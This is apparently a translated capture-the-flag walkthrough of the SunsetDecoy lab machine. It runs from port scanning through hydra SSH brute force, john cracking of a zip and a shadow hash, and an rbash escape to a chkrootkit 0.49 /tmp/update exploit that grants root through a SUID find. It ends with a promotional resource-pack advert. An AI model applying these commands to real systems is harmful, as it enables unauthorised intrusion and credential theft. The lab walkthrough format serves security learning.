Summary
getwebshell
: Found the zip
file → zip
has a password → john
exploded the zip
password → Found passwd
and shadow
files → Exploded shadow
password → ssh
login
Right escalation idea
: Discover background running programs → Upload pspy64
for viewing → Discover chkrootkit
→ chkrootkit
Elevate privileges
Preparation
-
Start VPN
Obtain the attacking machine IP →192.168.45.194
-
Start the drone
Get the target machine IP →192.168.190.85
Information collection-port scanning
Target open port collection
-
Nmap scans open ports 2 times (scan multiple times to reduce false scans)
sudo nmap --min-rate 10000 -p- 192.168.190.85 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Open ports - >22,80
Service detection corresponding to the target port
# tcp detection sudo nmap -sT -sV -O -sC -p22,80 192.168.190.85 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10 + deb10u2 80/tcp open http Apache httpd 2.4.38
Information collection-port test
22-SSH port information collection
22-SSH port version information and MSF utilization
Obtain SSH version information through Nmap
detection, you can try to use
The detection version is OpenSSH 7.9p1 Debian 10 + deb10u2
# Search for corresponding scripts msf6 > searchsploit openssh 7.9p1
22-Login methods supported by SSH protocol
Obtain SSH version information through Nmap
detection, and try after obtaining a certain user name
sudo ssh root<span class="label label-primary">@192.168.190.85</span> -v
Displaying publickey
and password
supports key and password login.
22-SSH manual login attempt (none)
Because password login is supported, try using a weak password for the root
account.
sudo ssh root<span class="label label-primary">@192.168.190.85</span> -p 22 # Password try password > root
Weak password attempt failed
22-SSH weak password blasting (wait quietly)
Because password login is supported, try to crack the password of the root
account, using the tool hydra
, and the thread-t is 6
sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.190.85 ssh -s 22
Hanging tools for blasting, we try to collect follow-up information
80-HTTP port information collection
Accessing http://192.168.190.85:80
is not CMS
, and a zip
was found during the access.
Use wget
to download
wget http://192.168.190.85/save.zip
Try to open and find that a password is required
┌──(root?Kali)-[/home/bachang/SunsetDecoy] └─# unzip save.zip Archive: save.zip [save.zip] etc/passwd password:
Brute force cracking-hash password cracking
# Use zip2john to convert zip zip2john save.zip → password.hash #Use john to decipher hashed zip password offline john --wordlist=/usr/share/wordlists/rockyou.txt password.hash
Got the password manuel
Extract
┌──(root?Kali)-[/home/bachang/SunsetDecoy] └─# unzip save.zip Archive: save.zip [save.zip] etc/passwd password: inflating: etc/passwd inflating: etc/shadow inflating: etc/group inflating: etc/sudoers inflating: etc/hosts extracting: etc/hostname
Judging from the name, it is the account and password information inside.
Vulnerability Exploitation-getwebshell
passwd username collection
┌──(root?Kali)-[/home/bachang/SunsetDecoy] └─# cat etc/passwd root:x:0:0:root:/root:/bin/bash ... systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin 296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
Through etc/passwd
we can collect the user name
shadow encryption password collection
┌──(root?Kali)-[/home/bachang/SunsetDecoy] └─# cat etc/shadow .... colord:*:18440:0:99999:7::: hplip:*:18440:0:99999:7::: systemd-coredump:!!:18440:::::: 296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV 0us.:18450:0:99999:7:::
In shadow
we will get the encrypted password
john brute force crack
# Use echo to turn into hash to facilitate brute force cracking echo '296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJ ZV0us.:18450:0:99999:7:::' > passwd.txt #Use john to decipher txt password offline john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
Got password server
22-SSH account and password login
After obtaining the account password, use SSH to log in
sudo ssh 296640a3b825115a47b68fc44501c828<span class="label label-primary">@192.168.190.85</span> -p22 password → server
Intranet travel-getshell
After connecting, it was found that it was rbash
SSH connection restricted escape
SSH connection restricted pseudo terminal escape
When connecting to the remote server through SSH, various commands were found to be restricted and exploited -t escape
# -t adds pseudo terminal bash -- indicates that the shell passed to bash does not load user configuration sudo ssh 296640a3b825115a47b68fc44501c828<span class="label label-primary">@192.168.190.85</span> -p22 -t "bash --noprofile" password → server # Get environment variables after ssh login echo $PATH # Rewrite environment variables PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
After connecting in, no command instructions were found to configure environment variables.
The current environment variables can be found locally and modified from time to time.
FLAG1 acquisition
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ find / -name local.txt 2>/dev/null /home/296640a3b825115a47b68fc44501c828/local.txt 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ cat local.txt f750ece6f4ea704c2902f5f7f6c10d2d
Information collection-Intranet basic information collection
The essence of privilege escalation lies in enumeration
. After obtaining the shell, we need to collect intranet information to prepare for privilege escalation
Detect the distribution version of Linux operating system
Older Ubuntu
and Linux systems can overlayfs
escalate privileges
# Determine the release version 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster
The distribution version is Debian
, and it is unlikely that overlayfs
can escalate privileges.
Detect the kernel version of the Linux operating system
Lower kernel versions can perform Dirty Cow
privilege escalation
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ uname -a Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 + deb10u1 (2020-06-07) x86_64 GNU/Linux
The kernel version is 4.19.0
Check the permissions of the current user
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ id uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
List all sudo files
Find escalable files that have sudo
permissions and do not require a password
If you find something in sudo -l
, visit https://gtfobins.github.io
to find it
# Use sudo -l to find 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ sudo -l sudo: unable to resolve host 60832e9f188106ec5bcc4eb7709ce592: Name or service not known We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for 296640a3b825115a47b68fc44501c828: Sorry, try again. [sudo] password for 296640a3b825115a47b68fc44501c828: Sorry, user 296640a3b825115a47b68fc44501c828 may not run sudo on 60832e9f188106ec5bcc4eb7709ce592.
Found that it didn’t work
List all suid files
If you find something in u=s
, visit https://gtfobins.github.io
to find it
# -perm file permissions 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ find / -perm -u=s -type f 2>/dev/null /usr/bin/newgrp /usr/bin/su /usr/bin/umount /usr/bin/pkexec /usr/bin/chsh /usr/bin/sudo /usr/bin/passwd /usr/bin/gpasswd /usr/bin/mount /usr/bin/chfn /usr/bin/fusermount /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper
getcap flag process collection
In higher versions, suid
is not fully listed, please check getcap
# Detect processes with the CAP_SETUID flag 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ /usr/sbin/getcap -r / 2>/dev/null /usr/bin/ping = cap_net_raw + ep
List scheduled tasks
Find all scheduled tasks and check whether the scheduled tasks have modification permissions
# Find scheduled tasks and modify them to escalate privileges cat /etc/crontab
Looking for root privileged processes
# Adjust the rows and columns to facilitate the query process stty rows 50 cols 250 # Search for processes to see if there is a process with root privileges ps aux | grep root
View historical information (none)
Maybe the historical information left by the user has useful information
history
Confirm the information in the /home directory
Users in the /home
directory can use the account dictionary to try weak passwords
and exploit
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ ls -al /home drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Aug 27 2020 296640a3b825115a47b68fc44501c8 28
Confirm whether there are hidden files in the current user’s home directory
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc -rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy -rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Jul 30 10:37 local.txt lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir -rwxr-xr-x 1 root root 807 Jun 27 2020 .profile -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor -rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 32 Aug 27 2020 user.txt
Saw a suspicious file with execution and read capabilities
Trying to run without being able to read
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status.
Found several functions
Discovery 5 has an interaction and will execute, but I can’t see it
We will be notified that the scan will start within 60 seconds. This hints that there is a process running and we might want to take a closer look
Pspy view process
Pspy is a command line tool for spying on processes without requiring root privileges. It allows you to view commands, cron tasks, etc. run by other users as they execute. This tool loops through the values under /proc to obtain process parameter information.
wget https://github.com/DominicBreuker/pspy.git
# Use python to open the http service to facilitate downloading files on the target machine sudo python3 -m http.server 80
# Download wget http://192.168.45.194:80/pspy64 #Give permissions chmod +x pspy64 # run ./pspy64
Run the script after uploading pspy64
Check if there is any progress
Found that /bin/sh /root/chkrootkit-0.49/chkrootkit
was executed
Elevation of privileges
chkrootkit privilege escalation
It is found that chkrootkit
will be performed in the program
searchsploit chkrootkit
You can find that there is exactly 0.49
cat /usr/share/exploitdb/exploits/linux/local/33899.txt
A closer look shows that placing an update
file under /tmp
will run with root
permissions.
Then constructing a malicious update
can allow me to escalate my privileges
#Move cd /tmp # Write privilege escalation echo '#!/bin/sh chmod + s /usr/bin/find' > update # Add execution chmod + x update # Check find permissions which find ls -al /usr/bin/find # find-suid privilege escalation find . -exec /bin/bash -p \; -quit
296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:/tmp$ ls -al /usr/bin/find -rwsr-sr-x 1 root root 315904 Feb 16 2019 /usr/bin/find 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:/tmp$ 296640a3b825115a47b68fc44501c828<span class="label label-primary">@60832e9f188106ec5bcc4eb7709ce592</span>:/tmp$ find . -exec /bin/bash -p \; -quit bash-5.0#id uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) euid=0(root) egid=0(root) groups=0(root),1000(296640a3b825 115a47b68fc44501c828) bash-5.0#
Successfully escalated privileges
FLAG2 acquisition
bash-5.0# cat /root/proof.txt 462b67a92407c2b0d746f9298fbfa2f6
Finished with flowers~
Summary
When you have no idea, you can upload pspy64
to try to discover the processes running under root
Finally
In order to help everyone learn network security better, the editor has prepared an introductory/advanced learning material for network security for everyone. The content in it is all notes and materials suitable for beginners with zero basic knowledge. It can be understood even if you don’t know programming. Understand, all the information is 282G in total. If friends need a complete set of network security introduction + advanced learning resource package, you can click to receive it for free (if you encounter problems with scanning the QR code, you can leave a message in the comment area to receive it)~
“Introduction to Network Security + Advanced Learning Resource Pack” CSDN Gift Pack: “Hacker & Network Security Introduction & Advanced Learning Resource Pack” free sharing
Learning routes for all directions of Internet Security (Heike Red and Blue Confrontation)
For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap for you. It can be said to be the most scientific and systematic learning route. It will be no problem for everyone to follow this general direction.
??
Learning Materials Toolkit
A good resource at the bottom of the box, it comprehensively introduces the basic theories of network security, including reverse engineering, eight-layer network defense, assembly language, white hat web security, cryptography, network security protocols, etc., and closely integrates basic theory with the application practice of mainstream tools. , which helps readers understand the implementation mechanisms behind various mainstream tools.
??
Network security source code collection + toolkit
Video tutorial
Interview question information
Exclusive channels collect test questions from JD.com, 360, Tianrongxin and other companies! Entering a big factory is just around the corner!
? All There are 282G of information in total. If you need a complete set of network security introduction + advanced learning resource package, you can click to receive it for free (if you encounter problems with scanning the QR code, you can leave a message in the comment area to receive it)~
Hacker/Network Security Gift Pack: CSDN Gift Pack: “Hacker &Network Security Introduction &Advanced Learning Resource Pack” Free Sharing